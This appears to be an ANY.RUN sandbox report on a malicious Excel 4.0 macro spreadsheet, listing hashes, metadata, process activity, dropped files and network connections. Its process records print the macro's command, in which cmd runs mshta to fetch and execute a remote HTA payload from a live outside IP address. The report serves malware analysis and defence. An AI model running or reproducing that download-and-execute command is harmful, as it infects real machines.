File name:

10027860264845636552.xls

Full analysis: https://app.any.run/tasks/13ecd54e-d197-41d3-aa71-b49caa5481fd
Verdict: Malicious activity
Analysis date: June 10, 2025, 07:24:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros40
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
MD5:

0E106000B2EF3603477CB460F2FC1751

SHA1:

7C0BD61A7069CC04D4A0AB02B96D9C4003BE0F6D

SHA256:

178CEAB4EA6816FB9D09C729B2A0D6A06BB786452D4178D49BD0A0DEE3F98359

SSDEEP:

1536:u8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhv:ugk3hbdlylKsgqopeJBWhZFGkE+cL2ND

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from MS Office

      • EXCEL.EXE (PID: 2324)
    • Microsoft Office executes commands via PowerShell or Cmd

      • EXCEL.EXE (PID: 2324)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2324)
  • SUSPICIOUS

    • Reads the Internet Settings

      • mshta.exe (PID: 3212)
      • mshta.exe (PID: 2032)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 3212)
      • mshta.exe (PID: 2032)
    • Manual execution by a user

      • EXCEL.EXE (PID: 2324)
    • Checks proxy server information

      • mshta.exe (PID: 3212)
      • mshta.exe (PID: 2032)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: xXx
LastModifiedBy: xXx
Software: Microsoft Excel
CreateDate: 2022:01:27 23:12:32
ModifyDate: 2022:01:28 17:08:40
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Protect
  • Sheet1
  • LINKO
HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe excel.exe cmd.exe no specs mshta.exe cmd.exe no specs mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
2032mshta http://91.240.118.172/cc/vv/fe.htmlC:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2308"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2324"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2532CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.htmlC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3212mshta http://91.240.118.172/cc/vv/fe.htmlC:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
4028CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.htmlC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225786
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
13 399
Read events
12 922
Write events
188
Delete events
289

Modification events

(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName: n
Value:
206E200004090000010000000000000000000000
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(2308) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
2
Text files
1
Unknown types
5

Dropped files

PID
Process
Filename
Type
2308EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR4200.tmp.cvr
MD5:
SHA256:
2324EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR3CBC.tmp.cvr
MD5:
SHA256:
2324EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\10027860264845636552.xls.LNKlnk
MD5:0BE319F234C79171B78628C9314B1EB7
SHA256:0FD1945D0BF5DFC3E16D28527522EA27FBDD6A4B8EB7201F9E53309EC9DE8BD5
2324EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:F975A906B33C3DF56F559520E020D1F1
SHA256:1678E2F5E522A339EA564E6F0F543F186DA690F6B04778ADBCD316F460C3A447
2324EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF36EF3D48E583D91F.TMPdocument
MD5:DC73BCBADC240DDDDEEDEB81DCCF22D9
SHA256:C6421E01CEAF6C443178B86575B9353DAF53B51E2349B631AE98D9CBFEC4D425
2324EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF7216276B8D962D2E.TMPgmc
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
2324EXCEL.EXEC:\Users\admin\Desktop\10027860264845636552.xlsdocument
MD5:1ADF7ABA48994723FCC8CD4E77CC9072
SHA256:12B5D32133F19FB8E58EC6CBFE5871720B74B017C4D64625864207D36F701A2F
2324EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFE1E413385E103975.TMPatn
MD5:B9BD17DE8495FD822D82B84524208354
SHA256:6D8881AD1EF3E7ADB638991D9E0B4FFD018DCED465EC745D1F2653E0AF6B74B1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
14
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2308
EXCEL.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120750
unknown
whitelisted
2308
EXCEL.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120751
unknown
whitelisted
2308
EXCEL.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120752
unknown
whitelisted
2324
EXCEL.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120750
unknown
whitelisted
2324
EXCEL.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120751
unknown
whitelisted
2324
EXCEL.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120752
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
224.0.0.252:5355
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
whitelisted
4
System
192.168.100.255:138
whitelisted
2308
EXCEL.EXE
95.100.186.9:80
go.microsoft.com
AKAMAI-AS
FR
whitelisted
2308
EXCEL.EXE
20.83.72.98:443
activation.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3212
mshta.exe
91.240.118.172:80
Chang Way Technologies Co. Limited
HK
unknown
2324
EXCEL.EXE
95.100.186.9:80
go.microsoft.com
AKAMAI-AS
FR
whitelisted
2324
EXCEL.EXE
20.83.72.98:443
activation.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2032
mshta.exe
91.240.118.172:80
Chang Way Technologies Co. Limited
HK
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
go.microsoft.com
  • 95.100.186.9
whitelisted
activation.sls.microsoft.com
  • 20.83.72.98
whitelisted
dns.msftncsi.com
  • 131.107.255.255
whitelisted

Threats

No threats detected
No debug info